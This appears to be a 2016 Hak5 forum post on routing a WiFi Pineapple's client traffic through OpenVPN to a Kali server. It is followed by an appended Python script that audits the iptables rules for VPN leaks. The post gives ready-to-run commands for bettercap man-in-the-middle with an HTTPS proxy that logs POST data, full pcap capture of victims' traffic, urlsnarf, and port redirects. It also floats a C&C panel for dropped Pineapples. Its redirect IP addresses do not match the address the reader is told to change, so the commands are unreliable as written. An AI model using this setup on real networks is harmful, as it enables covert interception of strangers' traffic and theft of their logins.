BeNe Posted August 9, 2016

I spent some time again with the Nano and my VPN Server since Darren & Snubs talked about VPN in the last Hak5 Sessions. The idea behind it is nothing new and I'm sure many Pineapple users out there have done it already this way (more or less). I'm talking about a Server to "power up" the Pineapple, something like a "WiFi-Pineapple Server". In simple words: route the complete Pineapple traffic (that also includes the traffic from the wifi clients) to a powerful VPN Server and attack/change/record it there. The Pineapple is mobile and perfect to broadcast SSIDs, deauth clients and catch them, but no Pineapple is powerful enough to play Man-in-the-Middle, save the whole traffic fast enough without any storage limit or generate certificates fast enough on the fly...

So the plan is simple:

- Install a Kali Linux inside a VPS (or take a Debian template and add the Kali repository).
- Install a VPN Server on it (you can use a simple script for that part --> https://github.com/Nyr/openvpn-install which is explained in the Hak5 Episode 2202).
- Copy the OpenVPN config to the Nano (/root/nano.ovpn in my case) and install openvpn (for some more info please check also the Hak5 Episode 2202):

    opkg update && opkg install openvpn-openssl

- Route all traffic to the VPN Server (add the following lines to the /etc/rc.local file):

    openvpn /root/nano.ovpn &
    iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o tun0 -j MASQUERADE
    iptables -A FORWARD -s 172.16.42.0/24 -o tun0 -j ACCEPT
    iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i tun0 -j ACCEPT

Now the complete traffic goes through the VPN tunnel to the Server where we can catch it on tun0.

Some examples:

Record the complete traffic to a pcap and show the output directly on the shell:

    tcpdump -i tun0 -w - | tee /root/tcpdump/dump-$(date +%F_%R).pcap | tcpdump -r -

Start a MiTM attack with bettercap:

    bettercap -L --no-discovery -O /root/bettercap/bettercap.log -X -P '*' --proxy -P POST --proxy-https --allow-local-connections

I added the "--no-discovery" option since it makes no sense on a hosted VPS. If you want to use the http & https proxy, you need to redirect the ports on the VPS:

    iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 443 -j DNAT --to-destination 22.214.171.124:8083
    iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 80 -j DNAT --to-destination 126.96.36.199:8080

Change 188.8.131.52 to your external Server IP address.

Fire up URLSnarf:

    urlsnarf -i tun0

Good to know: As we use OpenVPN with a tun device, the interface comes without a MAC address. So not every piece of software will run. A workaround is maybe to use a tap device (bridge) instead of a tun (routed). It is more overhead traffic, but if it works... In some cases you could use eth0 from your Server, in some not. Depends on your hoster's config and your tool.

Some more options: You can create a second or third OpenVPN config for your LAN Turtle, smartphone or laptop. If you open the tunnel on your smartphone or laptop you will be able to connect via 10.8.0.2 (in my case) to the Pineapple via ssh or the web interface. It is more or less the same as autossh, but just the easy way. So drop your Pineapple anywhere and connect simply via VPN.

Some simple ideas (brainstorming) for a Pineapple-Server:

- Backup your Pineapple files to the Server (logs, files, modules, ...)
- Sync broadcast SSIDs from one Pineapple to the other via VPN during a pentest for a higher result.
- A tactical web interface to connect directly to a dropped Pineapple, get status, see connected devices (like a C&C center)
- Pineapple-Stats v2 (was a cool module for the MarkV)
- Move modules to the Server instead of on the Pineapple to use the power of the Server (something like Install to Internal / SD-Card / Server)
- Use any other pentest tool you want, Metasploit on the Server :)

This works of course with the MarkV, Nano and Tetra.

As I said, it is nothing new to use a VPN connection, combine it with a Pineapple and route it to a Server. But this gives completely new options to every Pineapple user. Yes, you will need a Server and some know-how, but the speed and the options of it are worth it. Have fun - thanks!
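One thing the rc.local rules above do not cover is what happens when the tunnel drops: the FORWARD chain keeps its default ACCEPT policy, so client traffic silently falls back to the Pineapple's own uplink outside the VPN. The following is an added check script (my own example, not part of the original post or the Pineapple firmware) that parses an iptables-save dump, verifies the three rules from the post are present, and flags the missing tunnel-only policy; the dump text is a constructed sample, and the DROP-policy variant is my assumed hardening.

```python
CLIENT_NET = "172.16.42.0/24"   # Pineapple client network used in the post
VPN_IF = "tun0"                 # OpenVPN tun device on the Pineapple
# Constructed sample: roughly what `iptables-save` shows after the three rc.local rules.
SAMPLE_RULES = """\
*nat
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 172.16.42.0/24 -o tun0 -j MASQUERADE
COMMIT
*filter
:FORWARD ACCEPT [0:0]
-A FORWARD -s 172.16.42.0/24 -o tun0 -j ACCEPT
-A FORWARD -d 172.16.42.0/24 -i tun0 -m state --state ESTABLISHED,RELATED -j ACCEPT
COMMIT
"""
# Same rules with a DROP policy (assumed hardening) so clients cannot leave via the uplink.
HARDENED_RULES = SAMPLE_RULES.replace(":FORWARD ACCEPT", ":FORWARD DROP")

def parse_rules(dump):
    """Map table name -> {'policy': {chain: policy}, 'rules': [(chain, options)]}."""
    tables, table = {}, None
    for line in dump.splitlines():
        if line.startswith("*"):
            table = tables.setdefault(line[1:].strip(), {"policy": {}, "rules": []})
        elif line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            table["policy"][chain] = policy
        elif line.startswith("-A "):
            chain, opts = line[3:].split(" ", 1)
            table["rules"].append((chain, opts))
    return tables

def has_rule(rules, chain, *needles):
    # Order-independent match: iptables-save may reorder options relative to the typed command.
    return any(c == chain and all(n in o for n in needles) for c, o in rules)

def audit(dump):
    """Return a list of findings; an empty list means the tunnel-only setup is complete."""
    tables = parse_rules(dump)
    nat = tables.get("nat", {"rules": []})["rules"]
    filt = tables.get("filter", {"policy": {}, "rules": []})
    findings = []
    if not has_rule(nat, "POSTROUTING", f"-s {CLIENT_NET}", f"-o {VPN_IF}", "-j MASQUERADE"):
        findings.append("missing MASQUERADE of client net on tun0")
    if not has_rule(filt["rules"], "FORWARD", f"-s {CLIENT_NET}", f"-o {VPN_IF}", "-j ACCEPT"):
        findings.append("missing FORWARD accept for client net -> tun0")
    if not has_rule(filt["rules"], "FORWARD", f"-d {CLIENT_NET}", f"-i {VPN_IF}", "ESTABLISHED"):
        findings.append("missing FORWARD accept for return traffic from tun0")
    # Leak check: policy ACCEPT with no explicit drop means forwarding bypasses the VPN when tun0 is down.
    if filt["policy"].get("FORWARD") != "DROP" and not has_rule(
            filt["rules"], "FORWARD", f"-s {CLIENT_NET}", f"! -o {VPN_IF}", "-j DROP"):
        findings.append("FORWARD policy is ACCEPT and no drop rule: clients leak past the VPN when tun0 is down")
    return findings
```

Run it against `iptables-save` output from the Pineapple; the post's rule set as written reports only the leak finding, and the DROP-policy variant reports none.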